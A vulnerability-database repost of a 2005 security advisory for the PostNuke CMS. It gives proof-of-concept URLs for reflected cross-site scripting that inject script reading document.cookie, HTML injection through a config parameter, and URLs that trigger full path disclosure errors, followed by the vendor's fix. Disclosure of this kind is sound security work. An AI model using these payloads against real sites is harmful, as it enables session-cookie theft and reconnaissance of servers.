PostNuke XSS and Full path disclosure 0.760RC3=>x
漏洞ID | 1053312 | 漏洞类型 | |
发布时间 | 2005-09-30 | 更新时间 | 2005-09-30 |
CVE编号 | CVE-2005-1695 CVE-2005-1696 |
CNNVD-ID | N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Hash: SHA1
[PostNuke XSS and Full path disclosure 0.760RC3=>x cXIb8O3.7]
Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 15.3.2005
from SECURITYREASON.COM
- --- 0.Description ---
PostNuke: The Phoenix Release (0.750) and (0.760RC3)
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
- --- 1. Cross Site Scripting ---
1.0
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E
etc.
1.1
If you can see php error and register global = On
http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>
or for 0.750
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>
- --- 2. Full path disclosure ---
2.0
http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php
Error message :
- ---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.main]: failed to open stream: No
such file or directory in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
Fatal error: main() [function.require]: Failed opening required
'/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
- ---------------
2.1
http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php
Error message :
- ---------------
Fatal error: Call to undefined function pnModGetVar() in
/www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on line 48
- ---------------
2.2
http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php
Error message :
- ---------------
Fatal error: Call to undefined function pnSecAddSchema() in
/www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on line 48
- ---------------
2.3
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php
or for 0.760RC3
http://[HOST]/[DIR]/modules/Multisites/installation/config.php
Error message :
- ---------------
Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No such file or directory in
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2
Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for inclusion (include_path='.:') in
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2
- ---------------
2.4
http://[HOST]/[DIR]/xmlrpc.php
Error message :
- ---------------
Fatal error: Cannot redeclare xmlrpc_decode() in /www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line 1068
- ---------------
- --- 3. How to fix ---
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
or CVS
- --- 4.Contact ---
Author: Maksymilian Arciemowicz
相关推荐: Nuke BookMarks 0.6 – ‘Marks.php’ SQL Injection
Nuke BookMarks 0.6 – ‘Marks.php’ SQL Injection 漏洞ID 1054975 漏洞类型 发布时间 2005-03-26 更新时间 2005-03-26 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666